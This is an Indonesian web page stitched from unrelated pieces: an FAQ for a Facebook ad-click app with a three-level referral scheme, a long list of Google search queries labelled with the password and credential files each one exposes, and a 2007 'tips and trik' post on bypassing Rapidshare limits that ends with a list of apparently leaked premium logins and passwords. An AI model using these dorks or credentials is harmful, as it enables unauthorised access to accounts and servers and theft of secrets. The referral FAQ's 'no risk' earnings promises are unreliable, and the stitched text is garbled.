A: Click Ads adalah tipe iklan click, artinya pembaca meng-klik link iklan yang di tayangkan. Pembaca medapatkan komisi.
Qads adalah tipe iklan yang mengandung pertanyaan / quiz. Pembaca di haruskan menjawab pertanyaan terlebih dahulu, bila benar pembaca akan mendapatkan komisi.

Q: Dapatkah saya mendapatkan komisi lebih banyak dengan meng-klik atau menjawab iklan yang sama berkali-kali?
A: Tidak Dapat! komisi / point yang sah hanya di hitung satu kali saja! klik selanjutnya tidak akan di perhitungkan.

Q: Apa yang dapat saya lakukan untuk mendapat lebih banyak komisi?
A: Anda boleh mengundang teman-teman, mereka akan berada di dalam jaringan Anda . Kedalaman level jaringan hanya berlaku sampai dengan 3 tingkat di bawah. Misalkan Anda mempunyai jaringan level 1 sebanyak 10 orang, jaringan level 2 sebanyak 100 orang dan level 3 sebanyak 1000 orang, maka total jaringan di bawah Anda sebanyak 1110 orang.

Q: Bagaimana caranya saya mengundang teman-teman agar mereka bergabung di bawah saya?
Gunakan tombol share atau link di bawah ini untuk mengundang teman-teman Anda

Share

http://apps.facebook.com/bagi-bagi/index.php?fuid=13930106xx (anda punya no berbeda)

Q : ini MLM atau money game yah? ogah ah!
A : Anda tidak perlu keluar uang untuk menggunakan aplikasi ini, kecuali bila Anda ingin memasang iklan (Advertiser). Yang Anda lakukan adalah, gunakan aplikasi, duduk, perhatikan iklan-iklan yang ada, klik iklan atau jawab pertanyaan iklan yang ada. Komisi berupa point akan langsung ter-kredit ke account Anda.

Q : Point dari mana? bisa saya uangkan?
A: Ya, point bisa anda uangkan. Nilai 1 point seharga Rp 1.000,- bila point Anda mencapai syarat minimum transfer bank (di BCA sebesar Rp 10.000,-) atau 10 point, maka uang sebesar Rp 10.000,- akan di transfer melalui BANK. Jangan lupa, segera update nama bank dan nomer rekening bank Anda. Point datang dari Advertiser. Ketika Anda menjawab atau klik iklan milik Advertiser maka point akan di distribusikan kepada Anda dan upline-upline Anda.

Q : Bisa tolong jelaskan lebih detail
A : Misalkan Advertiser memasang iklan sebesar (20 point) atau Rp 20.000,- kepada Admin. Jumlah point tersebut untuk sebanyak (Rp 20.000 / Rp 500 ) = 40 orang yang iklannya (termasuk Anda). Jadi 1 kali klik Uniq Facebooker senilai Rp 500,- yang akan dibagikan sebagai berikut:

untuk Anda Rp 150,-
untuk upline level 1 Rp 60,-
untuk upline level 2 Rp 50,-
untuk upline level 3 Rp 40,-

Jadi bila Anda klik 10 iklan maka Anda akan mendapat (Rp 150,- x 10 iklan) = Rp 1500,-

Q: Dengan sistem jaringan, apakah tidak akan menguntungkan bagi yang join lebih dahulu?
A : Belum tentu yang bergabung duluan akan lebih sukses di banding join belakangan. Di sini di terapkan beberapa aturan misalnya:
# Kedalaman level hanya 3 tingkat di bawah Anda. Sangat mungkin terjadi misalnya total downline yang Anda miliki 100 orang, namun ada downline level 3 anda yang aktif dan mempunyai total dowline 1000 orang, ini mungkin saja terjadi
# Bila pengguna dalam rentang waktu tertentu tidak aktif menggunakan aplikasi ini maka para downlinenya akan di by pass ke upline level 1 di atasnya. Namun namanya tidak akan di hapus dan point-point yang telah di kumpulkan masih tetap ada.

Q: Berapa jumlah point yang saya miliki sampai detik ini?
A: Point milik Anda sampai detik ini adalah. 4,97 atau sama dengan Rp 4.970,00

Q: Sebentar...... saya kok masih ragu-ragu nih... ini tipu-tipuan? benar di bayar nggak sih?
A: Kemungkinan terburuknya adalah bila tidak ada Advertiser yang pasang iklan di sini. Berarti tidak ada iklan yang akan di tayangkan dan Anda sebagai pengguna tidak mendapatkan point. Anda akan mendapatkan catatan detail point yang telah Anda terima, bila point anda telah mencapai syarat minimum transfer bank sekitar Rp 10.000,- (10 point) maka akan segera di transfer, dan point Anda akan berkurang sejumlah nilai transfer.

Q : Hm... saya masih kurang sreg dengan 'jaringan', kesan-nya kok gimana yah?
A: Seperti MLM, skema ponzi, piramid, money game, arisan uang, bisnis 5 ember yah? Wajar bila Anda bersikap curiga. Di sini Anda tidak perlu keluar uang. No Risk! Makin banyak pengguna aplikasi ini, mudah-mudahan menarik (ADVERTISER) untuk memasang iklan di sini. Makin banyak dana yang di keluarkan advertiser untuk memasang iklan, makin banyak juga potensi komisi yang dapat Anda raih, itulah makanya aplikasi ini di beri nama "Bagi-Bagi", berbagi keuntungan :-)

Q: Apa itu iklan yang expired?
A: Ini adalah iklan yang sudah habis masa tayang / publikasi. Pemasang iklan (Advertiser) membayar sejumlah uang kepada pengelola, misalkan Rp 100.000,- Ini untuk 200 orang. Jadi 1 orang yang klik bernilai Rp 100 ribu / 200 orang = Rp 500. Uang 500 ini di distribusikan kepada:
Pengelola (Rp 200,-)
Anda (Rp 150,-)
Upline Level 1 (Rp 60,-)
Upline Level 2 (Rp 50,-)
Upline Level 3 (Rp 40,-)

Iklan ini akan mencapai expire bila sudah ada 200 orang yang menjawab atau meng-klik iklan ini. Automatis, iklan ini akan masuk ke dalam status "Expired".

Q: Apakah iklan yang expired bisa di perpanjang oleh Advertiser?
A: Ya, tentu saja. Bila Anda sebagai pemasang iklan (advertiser), Anda dapat memperpanjang iklan yang anda miliki. Bagusnya lagi... orang2 yang telah pernah menjawab / klik iklan Anda tidak akan di perhitungkan pointnya alias point mereka tidak akan bertambah. Contohnya, Anda membeli iklan untuk 200 orang seharga Rp 100.000,- Bila iklan ini telah mencapai expired, kemudian Anda hendak memperpanjang untuk 200 orang lagi, untuk iklan yang sama, maka Anda hanyalah transfer uang kembali kepada admin sebesar 100 ribu untuk 200 orang lagi dan ini tidak termasuk 200 orang kemarin yang sama yang telah membaca / menjawab iklan Anda.

Q: Apakah efektif memasang iklan di sini?
A: Tentu saja, dengan jumlah pengguna aplikasi sampai saat ini sebesar 20,000 orang lebih, mereka akan selalu menunggu-nunggu iklan dari Anda. Saran saya, untuk mempromosikan website/ produk/ jasa Anda, gunakan pertanyaan yang agak sulit, sehingga pembaca memang akan serius mempelajari website/ produk/ jasa dari Anda. Bila perlu, bila Anda mengiklankan website, berikanlah jawaban bila pembaca telah register dahulu di website Anda itu. DAN, jawaban dan pertanyaan bisa sesuka hati Anda sebagai advertiser merubahnya, ini mencegah... ada yang membocorkan jawaban kepada downline-downlinenya :-)

* inurl:/db/main.mdb |ASP-Nuke passwords
* filetype:cfm "cfapplication |ColdFusion source with potential passwords name" password
* filetype:pass |dbman credentials pass intext:userid
* allinurl:auth_user_file.txt |DCForum user passwords
* eggdrop filetype:user user |Eggdrop IRC user credentials
* filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
* filetype:url +inurl:"ftp://" |FTP bookmarks cleartext passwords
+inurl:"@"
* inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
* filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
* intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials
"htgroup" -intitle:"dist"
-apache -htpasswd.c
* intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials
htpasswd.bak
* "http://*:*@www" bob:bob |HTTP passwords (bob is a sample username)
* "sets mode: +k" |IRC channel keys (passwords)
* "Your password is * |Remember IRC NickServ registration passwords
this for later use"
* signin filetype:url |JavaScript authentication credentials
* LeapFTP intitle:"index.of./" |LeapFTP client login credentials
sites.ini modified
* inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
* filetype:config config intext: |Mcft .NET application credentials
appSettings "User ID"
* filetype:pwd service |Mcft FrontPage Service Web passwords
* intitle:index.of |Mcft FrontPage Web credentials
administrators.pwd
* "# -FrontPage-" |Mcft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Mcft FrontPage Web passwords
(Service | authors | administrators)
* inurl:perform filetype:ini |mIRC nickserv credentials
* intitle:"index of" intext: |mySQL database credentials
connect.inc
* intitle:"index of" intext: |mySQL database credentials
globals.inc
* filetype:conf oekakibbs |Oekakibss user passwords
* filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
* inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
* index.of passlist |Passlist user credentials
* inurl:passlist.txt |passlist.txt file user credentials
* filetype:dat "password.dat" |password.dat files
* inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
* filetype:log inurl:"password.log" |password.log files cleartext
|passwords
* inurl:people.lst filetype:lst |People.lst generic password file
* intitle:index.of config.php |PHP Configuration File database
|credentials
* inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
* inurl:nuke filetype:sql |PHP-Nuke credentials
* filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
"USER.PASS="
* filetype:ini ServUDaemon |servU FTP Daemon credentials
* filetype:conf slapd.conf |slapd configuration files root password
* inurl:"slapd.conf" intext: |slapd LDAP credentials
"credentials" -manpage
-"Manual Page" -man: -sample
* inurl:"slapd.conf" intext: |slapd LDAP root password
"rootpw" -manpage
-"Manual Page" -man: -sample
* filetype:sql "IDENTIFIED BY" –cvs |SQL passwords
* filetype:sql password |SQL passwords
* filetype:ini wcx_ftp |Total Commander FTP passwords
* filetype:netrc password |UNIX .netrc user credentials
* index.of.etc |UNIX /etc directories contain
|various credential files
* intitle:"Index of..etc" passwd |UNIX /etc/passwd user credentials
* intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
* intitle:"Index of" pwd.db |UNIX /etc/pwd.db credentials
* intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
* intitle:index.of master.passwd |UNIX master.passwd user credentials
* intitle:"Index of" spwd.db |UNIX spwd.db credentials
passwd -pam.conf
* filetype:bak inurl:"htaccess| |UNIX various password file backups
passwd|shadow|htusers
* filetype:inc dbconn |Various database credentials
* filetype:inc intext:mysql_ |Various database credentials, server names
connect
* filetype:properties inurl:db |Various database credentials, server names
intext:password
* inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
* inurl:"wvdial.conf" intext: |wdial dialup user credentials
"password"
* filetype:mdb wwforum |Web Wiz Forums Web credentials
* "AutoCreate=TRUE password=*" |Website Access Analyzer user passwords
* filetype:pwl pwl |Windows Password List user credentials
* filetype:reg reg +intext: |Windows Registry Keys containing user
"defaultusername" intext: |credentials
"defaultpassword"
* filetype:reg reg +intext: |Windows Registry Keys containing user
"internet account manager" |credentials
* "index of/" "ws_ftp.ini" |WS_FTP FTP credentials
"parent directory"
* filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
* inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
* inurl:php inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
* filetype:ctl |
inurl:haccess. |Mcft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
* filetype:reg |
reg intext: |Mcft Internet Account Manager can
* "internet account manager" |reveal usernames and more
filetype:wab wab |Mcft Outlook Express Mail address
|books
* filetype:mdb inurl:profiles |Mcft Access databases containing
|profiles.
* index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
* inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
* filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
* filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
* filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
* intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
* intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
* "index of " lck |Various lock files list the user currently using
|a file
* +intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
"Usage Statistics for"
* filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information

Your Ad Here
Mendapatkan Akses Premium Account di Rapidshare
posted : [14/02/2007, 04:43:08]
kategori : [tips and trik]
author : [WoNX]
Rapidshare[dot]de, situs penyedia layanan upload dan free download file, alternatif bagi para netter yang ingin tukar-menukar file. Cukup gunakan fasilitas upload berbasis web yang telah disediakan, catat alamat url file anda dan anda bisa mendownloadnya dari manapun lain waktu atau bagikan alamat url tersebut ke teman-teman anda jika anda ingin mereka juga "menikmati" file yang telah anda upload.
Ada 2 account yang ditawarkan oleh Rapidshare, yaitu Premium account dan Free Account. Masalahnya adalah pada Free account. User akan terganggu dengan adanya counter time. Counter time ini biasanya bisa mencapai lebih dari 1 menit. Jadi, rapidshare akan membuat anda menunggu selama kurang lebih satu menit sebelum menunjukkan url file yang nada minta. Huh.. cukup menyita waktu bukan?
Masalah kedua adalah Rapidshare akan mencatat alamat IP anda dan memberikan batasan untuk melakukan download.
Masalah ketiga, manusia selalu saja merasa kurang puas. Ketika dia sudah mendapatkan akses yang setara dengan premium account, dia akan berfikir, "gimana yach biar gue benr-bener dapet premium account". Okay, di artikel ini juga saya akan mewujudkan impian itu.
Sekarang, mari kita bahas ketiga masalah itu satu persatu.

:::::: Alat perang Kita ::::::
>> Seperangkat komputer dan koneksi internet ^_^
>> keberanian dan semangat yang tinggi Smile
>> Browser Mozilla Firefox

I. Melewati Conter Time
-------------------------
1. Copy-paste alamat (URL) file yang hendak anda download di address bar Mozilla.
2. Setelah halaman Rapidshare muncul, klik Free account.
3. Akan muncul counter down, abaikan saja, hapus string url di address bar anda hingga bersih, kemudian ketik kode java script berikut: javascript:alert(c=0)
4. Tekan ENTER, akan muncul sebuah message box di hadapan anda, tenang, jangan panik, tetap fokus dan bersabar ^_^ tekan saja [OK] dengan penuh percaya diri, counter down akan segera lenyap dari hadapan anda dan rapidshare akan menampilkan link download file yang ingin anda download.

II. Mengatasi Limit Download
------------------------------
Caranya simple, gunakan saja kumpulan proxy yang sudah diposting di www.spyrozone.tk halaman Artikel&Trik kategori komputer. Pilih sendiri dari ratusan proxy itu Smile

III. Benar-Benar Mendapatkan akses Premium Account
--------------------------------------------------
Jika kedua cara yang telah saya bahas hanya akan memberikan anda akses "setara" dengan premium account, kini anda akan benar-benar mendapatkan premium account! Gunakan saja User name dan password berikut:

LOGIN: 31989
PASSWORD: 2310214

LOGIN: 27766
PASSWORD: 8797341

User: 18549
Password: 4646182

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043

LOGIN: 20949
PASSWORD: 2716739

User: 22484
Password: 358030

User: 18549
Password: 4646182

User: 18800
Password: 9496722

LOGIN: 20949
PASSWORD: 2716739

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

Login: 20151
Password: 773290

Login: 20366
Password: 7177185

Login: 20374
Password: 5630758

Login: 20452
Password: 3249043


PENTING :
Gunakan trik dan account yang telah saya berikan untuk mendownload file-file yang bermanfaat. Sudah bukan jamannya lagi keterbatasan membatasi kita untuk belajar. Keep Learning and happy hacking..

Sumber: www.spyrozone.tk
--------------------------------------------------------------------------------------
Http://www.maestrocomp.info
www.jogjahacking.cjb.net
Cetak halaman ini

kembali ke kategori tips and trik